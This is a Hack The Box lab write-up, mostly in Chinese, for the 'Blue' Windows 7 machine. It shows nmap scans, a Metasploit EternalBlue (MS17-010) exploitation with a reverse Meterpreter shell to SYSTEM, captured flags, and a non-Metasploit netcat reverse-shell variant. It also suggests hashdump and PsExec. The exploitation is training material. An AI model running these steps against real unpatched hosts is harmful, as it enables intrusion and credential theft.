Blue Writeup

聲明
我只是個初學者。 Please correct me if I'm wrong.

HTB的第五十一台靶機，與第一台一樣lame。

靶機資訊(Machine Infromation)

Machine	Description
Name	Blue
OS	Windows
Difficulty	Easy
Author	ch4p

情蒐(Reconnaissance)

服務掃描(Services Scan)

Result

PORT      STATE  SERVICE      VERSION
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49151/tcp closed unknown
49152/tcp open   msrpc        Microsoft Windows RPC
49153/tcp open   msrpc        Microsoft Windows RPC
49154/tcp open   msrpc        Microsoft Windows RPC
49155/tcp open   msrpc        Microsoft Windows RPC
49156/tcp open   msrpc        Microsoft Windows RPC
49157/tcp open   msrpc        Microsoft Windows RPC
49158/tcp closed unknown
49159/tcp closed unknown
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-03-14T03:00:03+00:00
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
|_clock-skew: mean: -25s, deviation: 2s, median: -26s
| smb2-time:
|   date: 2024-03-14T03:00:01
|_  start_date: 2024-03-14T02:55:08
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

SMB弱點掃描 - Port 135,139,445

Bash

┌──(xavier㉿kali)-[~/…/htb/blue/recons/nmap]
└─$ sudo nmap -p 135,139,445 --script smb-vul* 10.129.214.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-14 02:03 EDT
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for 10.129.214.101
Host is up (0.33s latency).

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 18.98 seconds

MS-17-010 - EternalBlue

又是一個被打爛的洞。
如果你不知道的話，這個洞是駭客組織Shadow Broker在2017年將NSA的駭客工具公諸於世後才被發現的，而沒幾個月之後，WannaCry就來了。切記，政府機關永遠不正義，無所不用其極取得情資，即使傷害整體網路安全。
現在知道為什麼Blue的avatar是穿西裝的男人了吧。

Metasploit¹

Bash

┌──(xavier㉿kali)-[~/…/htb/blue/recons/nmap]
└─$ msfconsole
…
msf6 > search eternal

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
...
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.9
LHOST => 10.10.14.9
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 8787
LPORT => 8787
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.129.214.101
RHOSTS => 10.129.214.101
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2404 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    haris
The command completed with one or more errors.


C:\Windows\system32>type C:\Users\haris\Desktop\user.txt
type C:\Users\haris\Desktop\user.txt
9ed6837923bd49294822bc3ca357bc05

C:\Windows\system32>type C:\users\Administrator\Desktop\root.txt
type C:\users\Administrator\Desktop\root.txt
fa9332445be6cf80c9b70733de26b9a1

不用Metasploit

由於OSCP不允許使用Metasploit，在此也用GitHub上的腳本打看看，例如d4t4s3c的Win7Blue：

Bash

┌──(xavier㉿kali)-[~/Documents/CTF/htb/legacy]
└─$ nc -lvnp 8787
listening on [any] 8787 ...
connect to [10.10.14.9] from (UNKNOWN) [10.129.214.101] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>echo %USERDOMAIN%\%USERNAME%
echo %USERDOMAIN%\%USERNAME%
%USERDOMAIN%\SYSTEM

後記

如果想玩一下的話，可以用meterpreter執行hashdump，然後PsExec。

---

1. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption by Rapid7 ↩

---

Last update: 2024-12-23 Created: 2024-03-13